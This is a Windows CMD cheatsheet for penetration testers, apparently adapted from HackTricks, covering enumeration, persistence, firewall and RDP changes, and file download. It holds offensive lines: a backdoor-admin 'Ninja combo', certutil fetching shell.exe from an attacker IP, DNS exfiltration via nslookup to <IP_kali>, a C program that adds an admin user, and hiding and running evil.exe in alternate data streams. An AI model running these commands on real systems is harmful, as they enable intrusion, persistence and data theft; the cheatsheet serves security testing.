daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

basic-cmd-for-pentesters.md (17110B)


      1 ---
      2 title: "Basic Win CMD for Pentesters"
      3 section: "Windows"
      4 sectionSlug: "windows-hardening"
      5 sourcePath: "src/windows-hardening/basic-cmd-for-pentesters.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/windows-hardening/basic-cmd-for-pentesters.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # Basic Win CMD for Pentesters
     14 
     15 ## System info
     16 
     17 ### Version and Patches info
     18 
     19 ```bash
     20 wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% #Get architecture
     21 systeminfo
     22 systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #Get only that information
     23 wmic computersystem LIST full #Get PC info
     24 
     25 wmic qfe get Caption,Description,HotFixID,InstalledOn #Patches
     26 wmic qfe list brief #Updates
     27 where wmic 2>nul #WMIC is deprecated and may be absent on newer Windows 11 builds
     28 powershell -c "Get-CimInstance Win32_OperatingSystem | select Caption,Version,BuildNumber,OSArchitecture"
     29 powershell -c "Get-HotFix | select HotFixID,InstalledOn,Description"
     30 
     31 hostname
     32 
     33 DRIVERQUERY #3rd party driver vulnerable?
     34 ```
     35 
     36 ### Environment
     37 
     38 ```bash
     39 set #List all environment variables
     40 ```
     41 
     42 Some env variables to highlight:
     43 
     44 - **COMPUTERNAME**: Name of the computer
     45 - **TEMP/TMP:** Temp folder
     46 - **USERNAME:** Your username
     47 - **HOMEPATH/USERPROFILE:** Home directory
     48 - **windir:** C:\Windows
     49 - **OS**:Windos OS
     50 - **LOGONSERVER**: Name of domain controller
     51 - **USERDNSDOMAIN**: Domain name to use with DNS
     52 - **USERDOMAIN**: Name of the domain
     53 
     54 ```bash
     55 nslookup %LOGONSERVER%.%USERDNSDOMAIN% #DNS request for DC
     56 ```
     57 
     58 ### Mounted disks
     59 
     60 ```bash
     61 (wmic logicaldisk get caption 2>nul | more) || (fsutil fsinfo drives 2>nul)
     62 wmic logicaldisk get caption,description,providername
     63 ```
     64 
     65 ### [Defender](authentication-credentials-uac-and-efs/index.html#defender)
     66 
     67 ### Recycle Bin
     68 
     69 ```bash
     70 dir C:\$Recycle.Bin /s /b
     71 ```
     72 
     73 ### Processes, Services & Software
     74 
     75 ```bash
     76 schtasks /query /fo LIST /v #Verbose out of scheduled tasks
     77 schtasks /query /fo LIST 2>nul | findstr TaskName
     78 schtasks /query /fo LIST /v > schtasks.txt; cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM
     79 tasklist /V #List processes
     80 tasklist /SVC #links processes to started services
     81 net start #Windows Services started
     82 wmic service list brief #List services
     83 sc query #List of services
     84 dir /a "C:\Program Files" #Installed software
     85 dir /a "C:\Program Files (x86)" #Installed software
     86 reg query HKEY_LOCAL_MACHINE\SOFTWARE #Installed software
     87 ```
     88 
     89 ## Domain info
     90 
     91 ```bash
     92 # Generic AD info
     93 echo %USERDOMAIN% #Get domain name
     94 echo %USERDNSDOMAIN% #Get domain name
     95 echo %logonserver% #Get name of the domain controller
     96 set logonserver #Get name of the domain controller
     97 set log #Get name of the domain controller
     98 gpresult /V # Get current policy applied
     99 wmic ntdomain list /format:list	#Displays information about the Domain and Domain Controllers
    100 
    101 # Users
    102 dsquery user #Get all users
    103 net user /domain #List all users of the domain
    104 net user <ACCOUNT_NAME> /domain #Get information about that user
    105 net accounts /domain #Password and lockout policy
    106 wmic useraccount list /format:list #Displays information about all local accounts and any domain accounts that have logged into the device
    107 wmic /NAMESPACE:\\root\directory\ldap PATH ds_user GET ds_samaccountname #Get all users
    108 wmic /NAMESPACE:\\root\directory\ldap PATH ds_user where "ds_samaccountname='user_name'" GET # Get info of 1 users
    109 wmic sysaccount list /format:list # Dumps information about any system accounts that are being used as service accounts.
    110 
    111 # Groups
    112 net group /domain #List of domain groups
    113 net localgroup administrators /domain #List uses that belongs to the administrators group inside the domain (the group "Domain Admins" is included here)
    114 net group "Domain Admins" /domain #List users with domain admin privileges
    115 net group "domain computers" /domain #List of PCs connected to the domain
    116 net group "Domain Controllers" /domain #List PC accounts of domains controllers
    117 wmic group list /format:list # Information about all local groups
    118 wmic /NAMESPACE:\\root\directory\ldap PATH ds_group GET ds_samaccountname #Get all groups
    119 wmic /NAMESPACE:\\root\directory\ldap PATH ds_group where "ds_samaccountname='Domain Admins'" Get ds_member /Value #Members of the group
    120 wmic path win32_groupuser where (groupcomponent="win32_group.name="domain admins",domain="DOMAIN_NAME"") #Members of the group
    121 
    122 # Computers
    123 dsquery computer #Get all computers
    124 net view /domain #Lis of PCs of the domain
    125 nltest /dclist:<DOMAIN> #List domain controllers
    126 wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_samaccountname #All computers
    127 wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_dnshostname #All computers
    128 
    129 # Trust relations
    130 nltest /domain_trusts #Mapping of the trust relationships
    131 
    132 # Get all objects inside an OU
    133 dsquery * "CN=Users,DC=INLANEFREIGHT,DC=LOCAL"
    134 ```
    135 
    136 ### Entra ID / Hybrid Join
    137 
    138 Useful to quickly identify if the host is only AD-joined, Microsoft Entra joined, or hybrid joined, and whether the current user has a PRT cached for cloud SSO:<sup>[[1]](#references)</sup>
    139 
    140 ```bash
    141 dsregcmd /status
    142 dsregcmd /status | findstr /i "AzureAdJoined EnterpriseJoined DomainJoined DeviceAuthStatus TenantName AzureAdPrt"
    143 ```
    144 
    145 ### Logs & Events
    146 
    147 ```bash
    148 wevtutil el #List channels
    149 wevtutil gl Security #Configuration and size of a log
    150 wevtutil qe Security /rd:true /f:text /c:20
    151 wevtutil qe Microsoft-Windows-PowerShell/Operational /rd:true /f:text /c:20
    152 wevtutil qe Microsoft-Windows-Sysmon/Operational /rd:true /f:text /c:20
    153 wevtutil qe Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational /rd:true /f:text /c:20
    154 wevtutil qe Microsoft-Windows-Windows Defender/Operational /rd:true /f:text /c:20
    155 wevtutil epl Security C:\Temp\Security.evtx
    156 
    157 #Make a security query using another credentials
    158 wevtutil qe security /rd:true /f:text /r:helpline /u:HELPLINE\zachary /p:0987654321
    159 ```
    160 
    161 ## Users & Groups
    162 
    163 ### Users
    164 
    165 ```bash
    166 #Me
    167 whoami /all #All info about me, take a look at the enabled tokens
    168 whoami /priv #Show only privileges
    169 
    170 # Local users
    171 net users #All users
    172 dir /b /ad "C:\Users"
    173 net user %username% #Info about a user (me)
    174 net accounts #Information about password requirements
    175 wmic USERACCOUNT Get Domain,Name,Sid
    176 net user /add [username] [password] #Create user
    177 
    178 # Other logged-on users
    179 qwinsta #Anyone else logged in?
    180 
    181 #Lauch new cmd.exe with new creds (to impersonate in network)
    182 runas /netonly /user<DOMAIN>\<NAME> "cmd.exe" ::The password will be prompted
    183 
    184 #Check current logon session as administrator using logonsessions from sysinternals
    185 logonsessions.exe
    186 logonsessions64.exe
    187 ```
    188 
    189 ### Groups
    190 
    191 ```bash
    192 #Local
    193 net localgroup #All available groups
    194 net localgroup Administrators #Info about a group (admins)
    195 net localgroup administrators [username] /add #Add user to administrators
    196 
    197 #Domain
    198 net group /domain #Info about domain groups
    199 net group /domain <domain_group_name> #Users that belongs to the group
    200 ```
    201 
    202 ### List sessions
    203 
    204 ```text
    205 qwinsta
    206 klist sessions
    207 ```
    208 
    209 ### Password Policy
    210 
    211 ```text
    212 net accounts
    213 ```
    214 
    215 ### Credentials
    216 
    217 ```bash
    218 cmdkey /list #List credential
    219 vaultcmd /listcreds:"Windows Credentials" /all #List Windows vault
    220 rundll32 keymgr.dll, KRShowKeyMgr #You need graphical access
    221 ```
    222 
    223 ### Persistence with users
    224 
    225 ```bash
    226 # Add domain user and put them in Domain Admins group
    227 net user username password /ADD /DOMAIN
    228 net group "Domain Admins" username /ADD /DOMAIN
    229 
    230 # Add local user and put them local Administrators group
    231 net user username password /ADD
    232 net localgroup Administrators username /ADD
    233 
    234 # Add user to interesting groups:
    235 net localgroup "Remote Desktop Users" UserLoginName  /add
    236 net localgroup "Debugger users" UserLoginName /add
    237 net localgroup "Power users" UserLoginName /add
    238 ```
    239 
    240 ## Network
    241 
    242 ### Interfaces, Routes, Ports, Hosts and DNSCache
    243 
    244 ```bash
    245 ipconfig /all #Info about interfaces
    246 route print #Print available routes
    247 arp -a #Know hosts
    248 netstat -ano #Opened ports?
    249 type C:\WINDOWS\System32\drivers\etc\hosts
    250 ipconfig /displaydns | findstr "Record" | findstr "Name Host"
    251 ```
    252 
    253 ### Firewall
    254 
    255 ```bash
    256 netsh firewall show state # FW info, open ports
    257 netsh advfirewall firewall show rule name=all
    258 netsh firewall show config # FW info
    259 Netsh Advfirewall show allprofiles
    260 
    261 NetSh Advfirewall set allprofiles state off  #Turn Off
    262 NetSh Advfirewall set allprofiles state on  #Trun On
    263 netsh firewall set opmode disable #Turn Off
    264 
    265 #How to open ports
    266 netsh advfirewall firewall add rule name="NetBIOS UDP Port 138" dir=out action=allow protocol=UDP localport=138
    267 netsh advfirewall firewall add rule name="NetBIOS TCP Port 139" dir=in action=allow protocol=TCP localport=139
    268 netsh firewall add portopening TCP 3389 "Remote Desktop"
    269 
    270 #Enable Remote Desktop
    271 reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
    272 netsh firewall add portopening TCP 3389 "Remote Desktop"
    273 ::netsh firewall set service remotedesktop enable #I found that this line is not needed
    274 ::sc config TermService start= auto #I found that this line is not needed
    275 ::net start Termservice #I found that this line is not needed
    276 
    277 #Enable Remote Desktop with wmic
    278 wmic rdtoggle where AllowTSConnections="0" call SetAllowTSConnections "1"
    279 ##or
    280 wmic /node:remotehost path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections "1"
    281 
    282 #Enable Remote assistance:
    283 reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fAllowToGetHelp /t REG_DWORD /d 1 /f
    284 netsh firewall set service remoteadmin enable
    285 
    286 #Ninja combo (New Admin User, RDP + Rassistance + Firewall allow)
    287 net user hacker Hacker123! /add & net localgroup administrators hacker /add & net localgroup "Remote Desktop Users" hacker /add & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & netsh firewall add portopening TCP 3389 "Remote Desktop" & netsh firewall set service remoteadmin enable
    288 
    289 ::Connect to RDP (using hash or password)
    290 xfreerdp /u:alice /d:WORKGROUP /pth:b74242f37e47371aff835a6ebcac4ffe /v:10.11.1.49
    291 xfreerdp /u:hacker /d:WORKGROUP /p:Hacker123! /v:10.11.1.49
    292 ```
    293 
    294 ### Shares
    295 
    296 ```bash
    297 net view #Get a list of computers
    298 net view /all /domain [domainname] #Shares on the domains
    299 net view \\computer /ALL #List shares of a computer
    300 net use x: \\computer\share #Mount the share locally
    301 net share #Check current shares
    302 ```
    303 
    304 ### Wifi
    305 
    306 ```bash
    307 netsh wlan show profile #AP SSID
    308 netsh wlan show profile <SSID> key=clear #Get Cleartext Pass
    309 ```
    310 
    311 ### SNMP
    312 
    313 ```text
    314 reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
    315 ```
    316 
    317 ### Network Interfaces
    318 
    319 ```bash
    320 ipconfig /all
    321 ```
    322 
    323 ### ARP table
    324 
    325 ```bash
    326 arp -A
    327 ```
    328 
    329 ### Packet capture without third-party tools
    330 
    331 Windows Packet Monitor (`pktmon`) can capture packets and convert its ETL output to PCAPNG for analysis in tools such as Wireshark.<sup>[[2]](#references)</sup>
    332 
    333 ```bash
    334 pktmon filter remove
    335 pktmon filter add -p 445 #Capture SMB only
    336 pktmon start --capture --pkt-size 0 --file-name C:\Windows\Temp\pktmon.etl
    337 pktmon stop
    338 pktmon etl2pcap C:\Windows\Temp\pktmon.etl --out C:\Windows\Temp\pktmon.pcapng
    339 
    340 netsh trace show interfaces
    341 netsh trace start capture=yes tracefile=C:\Windows\Temp\nettrace.etl maxsize=256 filemode=circular
    342 netsh trace stop
    343 ```
    344 
    345 ## Download
    346 
    347 Curl.exe
    348 
    349 ```bash
    350 curl.exe -k -L "https://10.10.14.13/tool.exe" -o C:\Windows\Temp\tool.exe
    351 curl.exe -k -L "https://10.10.14.13/archive.zip" -o C:\Windows\Temp\archive.zip
    352 tar -xf C:\Windows\Temp\archive.zip -C C:\Windows\Temp\
    353 ```
    354 
    355 Bitsadmin.exe
    356 
    357 ```text
    358 bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1
    359 ```
    360 
    361 CertReq.exe
    362 
    363 ```text
    364 CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt
    365 ```
    366 
    367 Certutil.exe
    368 
    369 ```text
    370 certutil.exe -urlcache -split -f "http://10.10.14.13:8000/shell.exe" s.exe
    371 ```
    372 
    373 **Find much more searching for `Download` in** [**https://lolbas-project.github.io**](https://lolbas-project.github.io/)
    374 
    375 ## Misc
    376 
    377 ```bash
    378 cd #Get current dir
    379 cd C:\path\to\dir #Change dir
    380 dir #List current dir
    381 dir /a:h C:\path\to\dir #List hidden files
    382 dir /s /b #Recursive list without shit
    383 time #Get current time
    384 date #Get current date
    385 shutdown /r /t 0 #Shutdown now
    386 type <file> #Cat file
    387 
    388 #Runas
    389 runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe" #Use saved credentials
    390 runas /netonly /user:<DOMAIN>\<NAME> "cmd.exe" ::The password will be prompted
    391 
    392 #Hide
    393 attrib +h file #Set Hidden
    394 attrib -h file #Quit Hidden
    395 
    396 #Give full control over a file that you owns
    397 icacls <FILE_PATH> /t /e /p <USERNAME>:F
    398 icacls <FILE_PATH> /e /r <USERNAME> #Remove the permision
    399 
    400 #Recursive copy to smb
    401 xcopy /hievry C:\Users\security\.yawcam \\10.10.14.13\name\win
    402 
    403 #exe2bat to transform exe file in bat file
    404 
    405 #ADS
    406 dir /r #Detect ADS
    407 more file.txt:ads.txt #read ADS
    408 powershell (Get-Content file.txt -Stream ads.txt)
    409 
    410 # Get error messages from code
    411 net helpmsg 32 #32 is the code in that case
    412 ```
    413 
    414 ### Bypass Char Blacklisting
    415 
    416 ```bash
    417 echo %HOMEPATH:~6,-11%   #\
    418 who^ami   #whoami
    419 ```
    420 
    421 ### DOSfuscation
    422 
    423 Generates an obfuscated CMD line
    424 
    425 ```bash
    426 git clone https://github.com/danielbohannon/Invoke-DOSfuscation.git
    427 cd Invoke-DOSfuscation
    428 Import-Module .\Invoke-DOSfuscation.psd1
    429 Invoke-DOSfuscation
    430 help
    431 SET COMMAND type C:\Users\Administrator\Desktop\flag.txt
    432 encoding
    433 ```
    434 
    435 ### Listen address ACLs
    436 
    437 You can listen on [http://+:80/Temporary_Listen_Addresses/](http://+/Temporary_Listen_Addresses/) without being administrator.
    438 
    439 ```bash
    440 netsh http show urlacl
    441 ```
    442 
    443 ### Manual DNS shell
    444 
    445 **Attacker** (Kali) must use one of these 2 options:
    446 
    447 ```bash
    448 sudo responder -I <iface> #Active
    449 sudo tcpdump -i <iface> -A proto udp and dst port 53 and dst ip <KALI_IP> #Passive
    450 ```
    451 
    452 #### Victim
    453 
    454 **`for /f tokens`** technique: This allows us to execute commands, get the first X words of each line and send it through DNS to our server
    455 
    456 ```bash
    457 for /f %a in ('whoami') do nslookup %a <IP_kali> #Get whoami
    458 for /f "tokens=2" %a in ('echo word1 word2') do nslookup %a <IP_kali> #Get word2
    459 for /f "tokens=1,2,3" %a in ('dir /B C:\') do nslookup %a.%b.%c <IP_kali> #List folder
    460 for /f "tokens=1,2,3" %a in ('dir /B "C:\Program Files (x86)"') do nslookup %a.%b.%c <IP_kali> #List that folder
    461 for /f "tokens=1,2,3" %a in ('dir /B "C:\Progra~2"') do nslookup %a.%b.%c <IP_kali> #Same as last one
    462 #More complex commands
    463 for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('whoami /priv ^| findstr /i "enable"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i <IP_kali> #Same as last one
    464 ```
    465 
    466 You can also **redirect** the output, and then **read** it.
    467 
    468 ```text
    469 whoami /priv | finstr "Enab" > C:\Users\Public\Documents\out.txt
    470 for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('type "C:\Users\Public\Documents\out.txt"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i <IP_kali>
    471 ```
    472 
    473 ## Calling CMD from C code
    474 
    475 ```c
    476 #include <stdlib.h>     /* system, NULL, EXIT_FAILURE */
    477 
    478 // When executed by Administrator this program will create a user and then add him to the administrators group
    479 // i686-w64-mingw32-gcc addmin.c -o addmin.exe
    480 // upx -9 addmin.exe
    481 
    482 int main (){
    483     int i;
    484     i=system("net users otherAcc 0TherAcc! /add");
    485     i=system("net localgroup administrators otherAcc /add");
    486     return 0;
    487 }
    488 ```
    489 
    490 ## Alternate Data Streams CheatSheet (ADS/Alternate Data Stream)
    491 
    492 **Examples taken from** [**https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f**](https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f)**. There are a lot more in there!**<sup>[[3]](#references)</sup>
    493 
    494 ```bash
    495 ## Selected Examples of ADS Operations ##
    496 
    497 ### Adding Content to ADS ###
    498 # Append executable to a log file as an ADS
    499 type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
    500 # Download a script directly into an ADS
    501 certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
    502 
    503 ### Discovering ADS Content ###
    504 # List files and their ADS
    505 dir /R
    506 # Use Sysinternals tool to list ADS of a file
    507 streams.exe <c:\path\to\file>
    508 
    509 ### Extracting Content from ADS ###
    510 # Extract an executable stored in an ADS
    511 expand c:\ads\file.txt:test.exe c:\temp\evil.exe
    512 
    513 ### Executing ADS Content ###
    514 # Execute an executable stored in an ADS using WMIC
    515 wmic process call create '"C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"'
    516 # Execute a script stored in an ADS using PowerShell
    517 powershell -ep bypass - < c:\temp:ttt
    518 ```
    519 
    520 
    521 ## References
    522 
    523 - [1] [Microsoft Learn - Troubleshoot devices by using the `dsregcmd` command](https://learn.microsoft.com/en-us/entra/identity/devices/troubleshoot-device-dsregcmd)
    524 - [2] [Microsoft Learn - Packet Monitor (`pktmon`)](https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/pktmon)
    525 - [3] [api0cradle - Alternate Data Streams Cheatsheet (gist)](https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f)